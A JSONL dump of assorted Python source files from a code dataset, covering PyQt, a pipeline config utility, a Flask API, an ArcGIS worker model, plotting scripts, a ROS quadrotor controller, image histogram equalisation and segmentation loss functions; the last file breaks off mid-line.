QtGui.QImage('pyqt5/img_1.png')\n pixmap = QtGui.QPixmap.fromImage(image) \n label = QtWidgets.QLabel('testing', self)\n label.setPixmap(pixmap)\n\n #dockWidget.setWidget(pixmap)\n dockWidget.setWidget(label)\n dockWidget.setFloating(False)\n self.addDockWidget(Qt.RightDockWidgetArea, dockWidget)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n myWidget = MainWindow()\n myWidget.show()\n\n sys.exit(app.exec_())","sub_path":"200609-01-qdock.py","file_name":"200609-01-qdock.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"299802642","text":"from __future__ import print_function\n\nimport sys\nimport os\nimport logging\nimport yaml\nfrom fnmatch import fnmatch\n\nfrom .files import MinipipeFilesMixin\nfrom .items import MinipipeItemsMixin\n\n__all__ = [\n 'delete_modules',\n 'Minipipe',\n 'MinipipeConfig',\n 'MinipipeUtil',\n]\n\nLOG = logging.getLogger('minipipe')\n\n\ndef delete_modules(pattern, verbose=True):\n \"\"\"\n Delete all existing python modules that match\n the given pattern.\n\n Args:\n pattern: A str pattern to match against module names\n verbose: A bool, when true, prints each module that is deleted\n \"\"\"\n mods = sys.modules.keys()\n matching_mods = [mod for mod in mods if fnmatch(mod, pattern)]\n for mod in matching_mods:\n if verbose:\n print('Deleting module: {0}'.format(mod))\n del sys.modules[mod]\n\n\ndef remove_prefix(name, prefix):\n if name.startswith(prefix):\n return name[len(prefix):]\n\n\nclass MinipipeConfig(dict):\n \"\"\"\n A config dictionary for a Minipipe project.\n\n A MinipipeConfig can be loaded using `load_config`\n which accepts any path as a starting point, and then\n searches upwards until a minipipe_config.yaml file\n is found. If no path is given, starts from the\n current working directory.\n\n Can be subclassed to change how the config file is\n found, such as modifying the default anypath.\n \"\"\"\n\n @classmethod\n def from_path(cls, anypath=None):\n inst = cls()\n inst.load_config(anypath)\n return inst\n\n def __init__(self, *args, **kwargs):\n super(MinipipeConfig, self).__init__(*args, **kwargs)\n self.config_filename = 'minipipe_config.yaml'\n self._has_attempted_load = False\n\n def has_attempted_load(self):\n return self._has_attempted_load\n\n def is_valid(self):\n return 'config_filepath' in self\n\n def get_default_anypath(self):\n \"\"\"\n Return the default path to use for anypath if none is given\n \"\"\"\n return os.getcwd()\n\n def find_config_file(self, anypath=None):\n \"\"\"\n Find and return the full path to the config file.\n\n Args:\n anypath: A string path anywhere in the project. If None, will use\n the default anypath (usually the current working directory)\n \"\"\"\n if not anypath:\n anypath = self.get_default_anypath()\n\n filepath = Minipipe.find_file_upwards(\n self.config_filename, anypath)\n\n return filepath\n\n def load_config(self, anypath=None):\n \"\"\"\n Load a config file by searching for it using any path.\n\n Args:\n anypath: A string path anywhere in the project. If None, will use\n the default anypath (usually the current working directory)\n \"\"\"\n self.clear()\n self._has_attempted_load = True\n\n config_filepath = self.find_config_file(anypath)\n if not config_filepath:\n LOG.warning('Failed to find {0} from path: {1}'.format(\n self.config_filename, anypath))\n return\n\n with open(config_filepath, 'rb') as fp:\n loaded_config = yaml.load(fp)\n\n # TODO: better error handling of failed config load\n\n if loaded_config is not None:\n self.update(loaded_config)\n self.post_load_config(config_filepath)\n else:\n LOG.warning(\n \"Failed to load minipipe config: {0}\".format(config_filepath))\n\n def post_load_config(self, filepath):\n \"\"\"\n Apply any modifications to the config after it is loaded.\n Config will not be None when this is called.\n \"\"\"\n # store config filepath and dirpath\n self['config_filepath'] = filepath\n dirpath = os.path.dirname(filepath)\n self['config_dirpath'] = dirpath\n\n # evaluate full paths from '_relpath' keys\n keys = list(self.keys())\n for key in keys:\n if key.endswith('_relpath'):\n # add new key with _path suffix\n self[key[:-8] + '_path'] = Minipipe.join_path(\n dirpath, self[key])\n elif key.endswith('.relpath'):\n # add new key with _path suffix\n self[key[:-8] + '.path'] = Minipipe.join_path(\n dirpath, self[key])\n\n\nclass MinipipeUtil(object):\n \"\"\"\n The base class for any object that uses a MinipipeConfig.\n \"\"\"\n\n def __init__(self, config=None):\n \"\"\"\n Args:\n config: A MinipipeConfig or MinipipeUtil. If given a config,\n will use the config instance directly, if given a util,\n will use the config of that util when accessing.\n \"\"\"\n self._config = None\n self.parent = None\n if isinstance(config, MinipipeConfig):\n self._config = config\n elif isinstance(config, MinipipeUtil):\n self.parent = config\n\n def create_config(self):\n \"\"\"\n Create and return a new MinipipeConfig for this util.\n \"\"\"\n config = MinipipeConfig()\n self.init_config(config)\n return config\n\n def init_config(self, config):\n \"\"\"\n Initialize a newly created MinipipeConfig. This is an\n opportunity to load the config from a specific path,\n or modify other settings.\n \"\"\"\n pass\n\n def _get_config(self):\n \"\"\"\n Return the MinipipeConfig for this util.\n \"\"\"\n if self.parent:\n return self.parent._get_config()\n else:\n if not self._config:\n self._config = self.create_config()\n return self._config\n\n def get_config(self):\n \"\"\"\n Return the Minipipe instance for this util.\n\n Attempts to automatically load the config if it\n hasn't been loaded yet.\n \"\"\"\n config = self._get_config()\n if not config.has_attempted_load():\n LOG.info(\"Auto-loading MinipipeUtil config, it is recommended \"\n \"that load_config be called explicitly before use\")\n config.load_config()\n return config\n\n def load_config(self, anypath=None):\n mp = self._get_config()\n mp.load_config(anypath)\n\n @property\n def config(self):\n return self.get_config()\n\n def config_format(self, string_fmt):\n \"\"\"\n Format a string with the MinipipeConfig of this util.\n Modifies the format string to convert '{my.key}' into '{0[my.key]}'\n so that config keys with dots to not break the formatting.\n \"\"\"\n fixed_fmt = string_fmt.replace('{', '{0[').replace('}', ']}')\n return fixed_fmt.format(self.config)\n\n\nclass Minipipe(MinipipeUtil,\n MinipipeFilesMixin,\n MinipipeItemsMixin):\n \"\"\"\n A MinipipeUtil with many core methods for common functionality\n including path and file management.\n \"\"\"\n\n def titlecase(self, name):\n \"\"\"\n Convert a name to TitleCase\n\n Args:\n name: A string name\n \"\"\"\n title_keywords = self.config.get('titlecase_keywords', [])\n if name.upper() in title_keywords:\n return name.upper()\n if len(name):\n return name[0].upper() + name[1:]\n return name\n\n def titlecase_path(self, path):\n \"\"\"\n Convert an any case path to a TitleCase path.\n\n Args:\n path: A string path\n \"\"\"\n items = path.replace('\\\\', '/').split('/')\n title_items = [self.titlecase(item) for item in items]\n return self.join_path(*title_items)\n\n\nfuncs = [\n remove_prefix\n]\nfor func in funcs:\n setattr(Minipipe, func.__name__, staticmethod(func))\n","sub_path":"src/minipipe/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":7738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"38518079","text":"class Context(dict):\n def __init__(self, content=None, parent=None):\n self.parent = parent\n if content is None:\n content = {}\n dict.__init__(self, content)\n\n def __getitem__(self, which):\n try:\n return dict.__getitem__(self, which)\n except KeyError as err:\n if self.parent is not None:\n return self.parent[which]\n raise err\n\n def child(self):\n return Context(parent=self)\n\n def get(self, what, default=None):\n result = dict.get(self, what, default)\n if result is None and self.parent is not None:\n result = self.parent.get(what, default)\n return result\n\n\ndef default_context():\n from srl import ast\n return {\n \"digit\": ast.Digit(),\n \"letter\": ast.Letter(),\n \"whitespace\": ast.Whitespace(),\n }\n","sub_path":"srl/context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"138348188","text":"from pwn import *\nobjects = []\n\nobjects_num = objects.__len__()\nobjects_string = reduce(lambda x, y: x + p32(y.__len__()) + y, objects, \"\")\nobjects_total_length = objects_string.__len__()\nanimation = p32(0)\nbinary = p32(objects_num)\nbinary += p32(objects_total_length)\nbinary += animation\nbinary += objects_string\nopen(\"test_files/no_object_and_animation\", \"w\").write(binary)\n","sub_path":"test_files/for_generates/no_object_and_animation.py","file_name":"no_object_and_animation.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"409498422","text":"from flask_cors import CORS\n\nimport helpers\nimport logging\nfrom api import settings\nfrom flask import Flask, render_template, jsonify\nfrom flask_migrate import Migrate\nfrom werkzeug.debug import get_current_traceback\nfrom models import db\nfrom request_helpers import recover_identity\nfrom api.proposals import register_endpoints as register_proposal_endpoints\nfrom api.identities import register_endpoints as register_identity_endpoints\nfrom api.sessions import register_endpoints as register_session_endpoints\nfrom api.statistics import register_endpoints as register_statistic_endpoints\nfrom api.affiliates import register_endpoints as register_affiliates_endpoints\nfrom api.mobile import register_endpoints as register_mobile_endpoints\n\nif not settings.DISABLE_LOGS:\n helpers.setup_logger()\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\n# Enable to print SQL statements using get_debug_queries.\n# app.config['SQLALCHEMY_RECORD_QUERIES'] = True\n#\n# Usage example inside endpoints.\n# for info in get_debug_queries():\n# print(info.statement, info.parameters, info.duration, sep='\\n')\n# print('\\n')\n\nCORS(app, resources=[r'/v1/affiliates'])\nregister_proposal_endpoints(app)\nregister_identity_endpoints(app)\nregister_session_endpoints(app)\nregister_statistic_endpoints(app)\nregister_affiliates_endpoints(app)\nregister_mobile_endpoints(app)\n\n\ndef _generate_database_uri(db_config):\n return 'mysql+pymysql://{}:{}@{}/{}'.format(\n db_config['user'], db_config['passwd'], db_config['host'],\n db_config['name'])\n\n\napp.config['SQLALCHEMY_DATABASE_URI'] =\\\n _generate_database_uri(settings.DB_CONFIG)\n\n\nmigrate = Migrate(app, db)\n\n\n# TODO: move to authorization.py\n@app.route('/', methods=['GET'])\ndef home():\n return render_template(\n 'api.html',\n )\n\n\n# End Point example which recovers public address from signed payload\n@app.route('/v1/me', methods=['GET'])\n@recover_identity\ndef test_signed_payload(caller_identity):\n return jsonify({\n 'identity': caller_identity\n })\n\n\n@app.errorhandler(404)\ndef method_not_found(e):\n return jsonify(error='unknown API method'), 404\n\n\n@app.errorhandler(405)\ndef method_not_allowed(e):\n return jsonify(error='method not allowed'), 405\n\n\n@app.errorhandler(Exception)\ndef handle_error(e):\n track = get_current_traceback(\n skip=1,\n show_hidden_frames=True,\n ignore_system_exceptions=False\n )\n logging.error(track.plaintext)\n return jsonify(error=str(e)), 500\n\n\ndef start_debug_app():\n init_db()\n app.run(debug=True)\n\n\ndef init_db():\n db.init_app(app)\n\n\nif __name__ == '__main__':\n start_debug_app()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"586934858","text":"\"\"\" Defines the Worker class.\r\n\"\"\"\r\n\r\nfrom ..workforce import _store\r\nfrom .exceptions import ValidationError\r\nfrom .feature_model import FeatureModel\r\nfrom ._store import *\r\nfrom ._schemas import WorkerSchema\r\n\r\n\r\nclass Worker(FeatureModel):\r\n \"\"\"\r\n Represents a worker in a Workforce Project\r\n\r\n ================== ====================================================================\r\n **Argument** **Description**\r\n ------------------ --------------------------------------------------------------------\r\n project Required :class:`~arcgis.apps.workforce.Project`. The project that\r\n the worker belongs to.\r\n ------------------ --------------------------------------------------------------------\r\n feature Optional :class:`~arcgis.features.Feature`. The feature representing\r\n the worker. Mostly intended for\r\n internal usage. If supplied, other parameters are ignored.\r\n ------------------ --------------------------------------------------------------------\r\n geometry Optional :class:`Dict`. The geometry of the worker.\r\n ------------------ --------------------------------------------------------------------\r\n contact_number Optional :class:`String`. The contact number of the worker.\r\n ------------------ --------------------------------------------------------------------\r\n name Optional :class:`String`. The name of the worker.\r\n ------------------ --------------------------------------------------------------------\r\n notes Optional :class:`String`. The notes about the worker.\r\n ------------------ --------------------------------------------------------------------\r\n status Optional :class:`String`. The status of the worker.\r\n\r\n `not_working`, `working`, `on_break`\r\n ------------------ --------------------------------------------------------------------\r\n title Optional :class:`String`. The title of the worker.\r\n ------------------ --------------------------------------------------------------------\r\n user_id Optional :class:`String`. The user id of the worker\r\n ================== ====================================================================\r\n\r\n \"\"\"\r\n\r\n def __init__(self, project, feature=None, geometry=None, contact_number=None,\r\n name=None, notes=None, status=\"not_working\", title=None, user_id=None):\r\n super().__init__(project, project.workers_layer, feature)\r\n self._schema = WorkerSchema(project.workers_layer)\r\n if not feature:\r\n self.geometry = geometry\r\n self.contact_number = contact_number\r\n self.name = name\r\n self.notes = notes\r\n self.status = status\r\n self.title = title\r\n self.user_id = user_id\r\n\r\n def __str__(self):\r\n return \"{} ({})\".format(self.name, self.user_id)\r\n\r\n def __repr__(self):\r\n return \"\".format(self.object_id)\r\n\r\n def update(self, geometry=None, contact_number=None,\r\n name=None, notes=None, status=None, title=None, user_id=None):\r\n \"\"\"\r\n Updates the worker on the server\r\n\r\n ================== ====================================================================\r\n **Argument** **Description**\r\n ------------------ --------------------------------------------------------------------\r\n geometry Optional :class:`Dict`. The geometry of the worker.\r\n ------------------ --------------------------------------------------------------------\r\n contact_number Optional :class:`String`. The contact number of the worker.\r\n ------------------ --------------------------------------------------------------------\r\n name Optional :class:`String`. The name of the worker.\r\n ------------------ --------------------------------------------------------------------\r\n notes Optional :class:`String`. The notes about the worker.\r\n ------------------ --------------------------------------------------------------------\r\n status Optional :class:`String`. The status of the worker.\r\n\r\n `not_working`, `working`, `on_break`\r\n ------------------ --------------------------------------------------------------------\r\n title Optional :class:`String`. The title of the worker.\r\n ------------------ --------------------------------------------------------------------\r\n user_id Optional :class:`String`. The user id of the worker\r\n ================== ====================================================================\r\n\r\n \"\"\"\r\n update_worker(self.project, self, geometry, contact_number, name, notes, status, title, user_id)\r\n\r\n def delete(self):\r\n \"\"\"Deletes the worker from the server\"\"\"\r\n delete_workers(self.project, [self])\r\n\r\n @property\r\n def name(self):\r\n \"\"\"Gets/Sets the name of the worker\"\"\"\r\n return self._feature.attributes.get(self._schema.name)\r\n\r\n @name.setter\r\n def name(self, value):\r\n self._feature.attributes[self._schema.name] = value\r\n\r\n @property\r\n def contact_number(self):\r\n \"\"\"Gets/Sets the contact number of the worker\"\"\"\r\n return self._feature.attributes.get(self._schema.contact_number)\r\n\r\n @contact_number.setter\r\n def contact_number(self, value):\r\n self._feature.attributes[self._schema.contact_number] = value\r\n\r\n @property\r\n def title(self):\r\n \"\"\"Gets/Sets the title of the worker\"\"\"\r\n return self._feature.attributes.get(self._schema.title)\r\n\r\n @title.setter\r\n def title(self, value):\r\n self._feature.attributes[self._schema.title] = value\r\n\r\n @property\r\n def notes(self):\r\n \"\"\"Gets/Sets the notes of the worker\"\"\"\r\n return self._feature.attributes.get(self._schema.notes)\r\n\r\n @notes.setter\r\n def notes(self, value):\r\n self._feature.attributes[self._schema.notes] = value\r\n\r\n @property\r\n def user_id(self):\r\n \"\"\"Gets/Sets the user id of the worker\"\"\"\r\n return self._feature.attributes.get(self._schema.user_id)\r\n\r\n @user_id.setter\r\n def user_id(self, value):\r\n self._feature.attributes[self._schema.user_id] = value\r\n\r\n @property\r\n def status(self):\r\n \"\"\"\r\n Gets/Sets the :class:`String` status of the worker\r\n\r\n `not_working`, `working`, `on_break`\r\n \"\"\"\r\n lut = {\r\n 0: \"not_working\",\r\n 1: \"working\",\r\n 2: \"on_break\",\r\n }\r\n if self._feature.attributes[self._schema.status] is not None:\r\n return lut[self._feature.attributes[self._schema.status]]\r\n else:\r\n return None\r\n\r\n @status.setter\r\n def status(self, value):\r\n if (isinstance(value, int) and value >= 0 and value <= 2) or value is None:\r\n self._feature.attributes[self._schema.status] = value\r\n elif isinstance(value, str):\r\n reduced_str = value.lower().replace(\" \", \"\").replace(\"_\", \"\")\r\n if reduced_str == \"notworking\":\r\n self._feature.attributes[self._schema.status] = 0\r\n elif reduced_str == \"working\":\r\n self._feature.attributes[self._schema.status] = 1\r\n elif reduced_str == \"onbreak\":\r\n self._feature.attributes[self._schema.status] = 2\r\n else:\r\n raise ValidationError(\"Invalid status\", self)\r\n else:\r\n raise ValidationError(\"Invalid status\", self)\r\n\r\n @FeatureModel.geometry.setter\r\n def geometry(self, value):\r\n self._feature.geometry = value\r\n\r\n def _validate(self, **kwargs):\r\n \"\"\"\r\n \"\"\"\r\n errors = super()._validate(**kwargs)\r\n errors += self._validate_name()\r\n errors += self._validate_status()\r\n errors += self._validate_user_id()\r\n return errors\r\n\r\n def _validate_for_add(self, **kwargs):\r\n errors = super()._validate_for_add(**kwargs)\r\n errors += self._validate_user_id_on_server()\r\n return errors\r\n\r\n def _validate_for_update(self, **kwargs):\r\n errors = super()._validate_for_update(**kwargs)\r\n errors += self._validate_user_id_on_server()\r\n return errors\r\n\r\n def _validate_for_remove(self, **kwargs):\r\n errors = super()._validate_for_remove(**kwargs)\r\n assignments = _store.query_assignments(self.project, \"{} = {}\".format(self.project._assignment_schema.worker_id, self.object_id))\r\n if assignments:\r\n errors.append(ValidationError(\"Cannot remove a Worker that has assignments\", self))\r\n return errors\r\n\r\n def _validate_name(self):\r\n errors = []\r\n if not self.name or self.name.isspace():\r\n errors.append(ValidationError(\"Worker cannot have an empty name\", self))\r\n return errors\r\n\r\n def _validate_status(self):\r\n errors = []\r\n if self.status is None:\r\n errors.append(ValidationError(\"Worker must have a status\", self))\r\n return errors\r\n\r\n def _validate_user_id(self):\r\n errors = []\r\n if not self.user_id or self.user_id.isspace():\r\n errors.append(ValidationError(\"Worker cannot have an empty user_id\", self))\r\n return errors\r\n\r\n def _validate_user_id_on_server(self):\r\n errors = []\r\n user = self.project.gis.users.get(self.user_id)\r\n if user is None:\r\n message = \"The Worker user_id must match an accessible named user id\"\r\n errors.append(ValidationError(message, self))\r\n\r\n workers = [w for w in self.project._cached_workers.values() if w.user_id == self.user_id]\r\n duplicate_workers = [w for w in workers if w.object_id != self.object_id]\r\n if duplicate_workers:\r\n message = \"There cannot be multiple Workers with the same user_id\"\r\n errors.append(ValidationError(message, self))\r\n return errors\r\n","sub_path":"arcpyenv/arcgispro-py3-clone/Lib/site-packages/arcgis/apps/workforce/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":10416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"112691110","text":"#!/usr/bin/python\n\nimport numpy as np\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\n\nsample_data = 1\nnsamp = 10000*sample_data\ndt = 1e-3\ndtSamp = dt*nsamp\n\n# Mean square displacment\nindata = np.loadtxt('msd_post.txt',dtype=float)\n\nd = indata.shape[1] # dimensions\nN = indata.shape[0] # number of data points\n\nt = np.zeros(N)\nfor i in np.arange(N):\n t[i] = indata[i][0]\n\nv = np.zeros(N)\nfor i in np.arange(N):\n v[i] = indata[i][1]/((2*20/np.pi)*(2*20/np.pi))\n\nplt.figure(figsize=(12,10))\n\nfig = plt.subplot(211)\nplt.plot(t,v)\nplt.ylabel('$<\\\\Delta r^{2}>/4R^2$',fontsize=30)\nplt.title('Mean square displacement',fontsize=35,fontweight='bold')\nfig.tick_params(axis='both', which='major', labelsize=20)\n\nfig = plt.subplot(212)\nplt.loglog(t,v)\nplt.xlabel('$\\\\Delta t$',fontsize=30)\nplt.ylabel('$<\\\\Delta r^{2}>/4R^2$',fontsize=30)\nfig.tick_params(axis='both', which='major', labelsize=20)\n\nplt.savefig('msd_post.png',bbox_inches='tight')\n\n\n# Plot exponent coefficients\nindata = np.loadtxt('msd_post.txt',dtype=float)\n\nd = indata.shape[1] # dimensions\nN = indata.shape[0] # number of data points\n\nt = np.zeros(N)\nfor i in np.arange(N):\n t[i] = indata[i][0]\n\nv = np.zeros(N)\nfor i in np.arange(N):\n v[i] = indata[i][1]\n\nt_log = np.log(t[1:np.size(t)])\nmsd_log = np.log(v[1:np.size(v)])\negim_offset = 10\nN = 90\negim = np.zeros(N)\nt_egim = np.zeros(N)\ni = 0\nfor i in np.arange(N):\n coef = np.polyfit(t_log[i:i+egim_offset],msd_log[i:i+egim_offset],1)\n egim[i] = coef[0]\n t_egim[i] = dtSamp*i\n\nplt.figure(figsize=(12,10))\nfig = plt.subplot(111)\nplt.plot(t_egim,egim,'o')\nplt.title('Exponent fits within a window of %s' %(egim_offset), fontsize=20,fontweight='bold')\nplt.xlabel('t',fontsize=20)\nplt.ylabel('$\\\\alpha$',fontsize=20)\nfig.tick_params(axis='both', which='major', labelsize=20)\n\nplt.savefig('exponents.png',bbox_inches='tight')\n\n","sub_path":"OldCellAnalysis/New_found/plot_sampling.py","file_name":"plot_sampling.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"203313135","text":"from geometry_msgs.msg import Twist\n\nclass Quadrotor:\n \"\"\"\n Holds all information about a quadrotor and can control the quadrotor\n completely\n \"\"\"\n def __init__(self):\n self.pos = [0, 0, 0]\n self.vel = [0, 0, 0]\n self.acc = [0, 0, 0]\n\n self.ang = [0, 0, 0]\n self.ang_vel = [0, 0, 0]\n self.ang_acc = [0, 0, 0]\n\n self.publisher = rospy.Publisher('cmd_vel', Twist, queue_size=10)\n\n def send(self):\n \"\"\"\n Makes a Twist message and sends it\n \"\"\"\n msg = Twist()\n\n msg.linear.x = self.vel[0]\n msg.linear.y = self.vel[1]\n msg.linear.z = self.vel[2]\n msg.angular.x = self.ang_vel[0]\n msg.angular.y = self.ang_vel[1]\n msg.angular.z = self.ang_vel[2]\n\n self.publisher.publish(msg)","sub_path":"hector_keyboard_controller/scripts/quadrotor/Quadrotor.py","file_name":"Quadrotor.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"221643476","text":"# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\n\r\nSpyder Editor\r\n\r\n\r\n\r\nThis is a temporary script file.\r\n\r\n\"\"\"\r\n\r\nimport numpy as np\r\n\r\nimport pylab as plt\r\n\r\nfrom PIL import Image\r\n\r\nimport math\r\nI = Image.open( \"..//images/161062.jpg\")\r\n#I = Image.open( \"C://Users/tianzixie/Desktop/1610621.jpg\")\r\n#imgsrc = \"https://www2.eecs.berkeley.edu/Research/Projects/CS/vision/bsds/BSDS300/html/images/plain/normal/gray/161062.jpg\"\r\n#from skimage import io\r\n#I = io.imread(imgsrc)\r\n\r\nimgArr = np.array(I)\r\n\r\nimgArrr=np.array(I)\r\n\r\nImage.fromarray(imgArr).show()\r\n\r\nhis = np.zeros(256)\r\n\r\nprob = np.zeros(256)\r\n\r\n#create array\r\n\r\nfor i in range(imgArr.shape[0]):\r\n\r\n for j in range(imgArr.shape[1]):\r\n\r\n his[imgArr[i, j]] = his[imgArr[i, j]] + 1\r\n\r\nfor i in range(256):\r\n\r\n prob[i]=his[i]/(imgArr.shape[0]*imgArr.shape[1])\r\n\r\nplt.plot(prob)\r\n\r\nplt.show()\r\n\r\n#show a picture of probability before operation\r\n\r\nplt.plot(his)\r\n\r\nplt.show()\r\n\r\n#show a histogram before operation\r\n\r\nE=0\r\n\r\nC=0\r\n\r\nfor j in range(256):\r\n\r\n A=0\r\n\r\n B=0\r\n\r\n \r\n\r\n for i in range(j):\r\n\r\n if prob[i]>0:\r\n\r\n A=A-prob[i]*math.log(prob[i])\r\n\r\n for i in range(256-j):\r\n\r\n if prob[i]>0:\r\n\r\n B=B-prob[i]*math.log(prob[i])\r\n\r\n if C<(A+B):\r\n\r\n C=A+B\r\n\r\n D=j\r\n\r\ncu=np.zeros(256)\r\n\r\nfor i in range(256):\r\n\r\n if i==0:\r\n\r\n cu[i]=prob[i]*255\r\n\r\n else:\r\n\r\n cu[i]=cu[i-1]+prob[i]*255 \r\n\r\nP=0\r\n\r\nfor i in range(imgArrr.shape[0]):\r\n\r\n for j in range(imgArrr.shape[1]):\r\n\r\n a= cu[imgArrr[i,j]]+0.5 \r\n\r\n imgArrr[i,j]=int(a)\r\n\r\n#operation\r\n\r\nImage.fromarray(imgArrr).show() \r\n\r\nhis2 = np.zeros(256)\r\n\r\nprob = np.zeros(256) \r\n\r\nfor i in range(imgArr.shape[0]):\r\n\r\n for j in range(imgArr.shape[1]):\r\n\r\n his2[imgArrr[i, j]] = his2[imgArrr[i, j]] + 1 \r\n\r\nfor i in range(256):\r\n\r\n prob[i]=his2[i]/(imgArr.shape[0]*imgArr.shape[1])\r\n\r\nplt.plot(prob)\r\n\r\nplt.show()\r\n\r\n#show a picture of probability after operation\r\n\r\nplt.plot(his2)\r\n\r\nplt.show()\r\n\r\n#show a histogram after operation","sub_path":"Answers/code/Ansewer5_1.py","file_name":"Ansewer5_1.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"542177195","text":"\"\"\"\nDescription\n++++++++++++++++++++++\nAddition losses module defines classses which are commonly used particularly in segmentation and are not part of standard pytorch library.\n\nUsage\n++++++++++++++++++++++\nImport the package and Instantiate any loss class you want to you::\n\n from nn_common_modules import losses as additional_losses\n loss = additional_losses.DiceLoss()\n\n Note: If you use DiceLoss, insert Softmax layer in the architecture. In case of combined loss, do not put softmax as it is in-built\n\nMembers\n++++++++++++++++++++++\n\"\"\"\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn.modules.loss import _Loss, _WeightedLoss\nimport numpy as np\nfrom torch.autograd import Variable\n\n\nclass DiceLoss(_WeightedLoss):\n \"\"\"\n Dice Loss for a batch of samples\n \"\"\"\n\n def forward(self, output, target, weights=None, ignore_index=None, binary=False):\n \"\"\"\n Forward pass\n\n :param output: NxCxHxW logits\n :param target: NxHxW LongTensor\n :param weights: C FloatTensor\n :param ignore_index: int index to ignore from loss\n :param binary: bool for binarized one chaneel(C=1) input\n :return: torch.tensor\n \"\"\"\n output = F.softmax(output, dim=1)\n if binary:\n return self._dice_loss_binary(output, target)\n return self._dice_loss_multichannel(output, target, weights, ignore_index)\n\n @staticmethod\n def _dice_loss_binary(output, target):\n \"\"\"\n Dice loss for one channel binarized input\n\n :param output: Nx1xHxW logits\n :param target: NxHxW LongTensor\n :return:\n \"\"\"\n eps = 0.0001\n\n intersection = output * target\n numerator = 2 * intersection.sum(0).sum(1).sum(1)\n denominator = output + target\n denominator = denominator.sum(0).sum(1).sum(1) + eps\n loss_per_channel = 1 - (numerator / denominator)\n\n return loss_per_channel.sum() / output.size(1)\n\n @staticmethod\n def _dice_loss_multichannel(output, target, weights=None, ignore_index=None):\n \"\"\"\n Forward pass\n\n :param output: NxCxHxW Variable\n :param target: NxHxW LongTensor\n :param weights: C FloatTensor\n :param ignore_index: int index to ignore from loss\n :param binary: bool for binarized one chaneel(C=1) input\n :return:\n \"\"\"\n eps = 0.0001\n encoded_target = output.detach() * 0\n\n if ignore_index is not None:\n mask = target == ignore_index\n target = target.clone()\n target[mask] = 0\n encoded_target.scatter_(1, target.unsqueeze(1), 1)\n mask = mask.unsqueeze(1).expand_as(encoded_target)\n encoded_target[mask] = 0\n else:\n encoded_target.scatter_(1, target.unsqueeze(1), 1)\n\n if weights is None:\n weights = 1\n\n intersection = output * encoded_target\n numerator = 2 * intersection.sum(0).sum(1).sum(1)\n denominator = output + encoded_target\n\n if ignore_index is not None:\n denominator[mask] = 0\n denominator = denominator.sum(0).sum(1).sum(1) + eps\n loss_per_channel = weights * (1 - (numerator / denominator))\n\n return loss_per_channel.sum() / output.size(1)\n\n\nclass IoULoss(_WeightedLoss):\n \"\"\"\n IoU Loss for a batch of samples\n \"\"\"\n\n def forward(self, output, target, weights=None, ignore_index=None):\n \"\"\"Forward pass\n \n :param output: shape = NxCxHxW\n :type output: torch.tensor [FloatTensor]\n :param target: shape = NxHxW\n :type target: torch.tensor [LongTensor]\n :param weights: shape = C, defaults to None\n :type weights: torch.tensor [FloatTensor], optional\n :param ignore_index: index to ignore from loss, defaults to None\n :type ignore_index: int, optional\n :return: loss value\n :rtype: torch.tensor\n \"\"\"\n\n output = F.softmax(output, dim=1)\n\n eps = 0.0001\n encoded_target = output.detach() * 0\n\n if ignore_index is not None:\n mask = target == ignore_index\n target = target.clone()\n target[mask] = 0\n encoded_target.scatter_(1, target.unsqueeze(1), 1)\n mask = mask.unsqueeze(1).expand_as(encoded_target)\n encoded_target[mask] = 0\n else:\n encoded_target.scatter_(1, target.unsqueeze(1), 1)\n\n if weights is None:\n weights = 1\n\n intersection = output * encoded_target\n numerator = intersection.sum(0).sum(1).sum(1)\n denominator = (output + encoded_target) - (output * encoded_target)\n\n if ignore_index is not None:\n denominator[mask] = 0\n denominator = denominator.sum(0).sum(1).sum(1) + eps\n loss_per_channel = weights * (1 - (numerator / denominator))\n\n return loss_per_channel.sum() / output.size(1)\n\n\nclass CrossEntropyLoss2d(_WeightedLoss):\n \"\"\"\n Standard pytorch weighted nn.CrossEntropyLoss\n \"\"\"\n\n def __init__(self, weight=None):\n super(CrossEntropyLoss2d, self).__init__()\n self.nll_loss = nn.CrossEntropyLoss(weight)\n\n def forward(self, inputs, targets):\n \"\"\"\n Forward pass\n\n :param inputs: torch.tensor (NxC)\n :param targets: torch.tensor (N)\n :return: scalar\n \"\"\"\n return self.nll_loss(inputs, targets)\n\n\nclass CombinedLoss(_Loss):\n \"\"\"\n A combination of dice and cross entropy loss\n \"\"\"\n\n def __init__(self):\n super(CombinedLoss, self).__init__()\n self.cross_entropy_loss = CrossEntropyLoss2d()\n self.dice_loss = DiceLoss()\n self.focal_loss = FocalLoss()\n self.l2_loss = nn.MSELoss()\n\n def forward(self, input, target, weight=None):\n \"\"\"\n Forward pass\n\n :param input: torch.tensor (NxCxHxW)\n :param target: torch.tensor (NxHxW)\n :param weight: torch.tensor (NxHxW)\n :return: scalar\n \"\"\"\n # input_soft = F.softmax(input, dim=1)\n target = target.type(torch.long)\n y_2 = 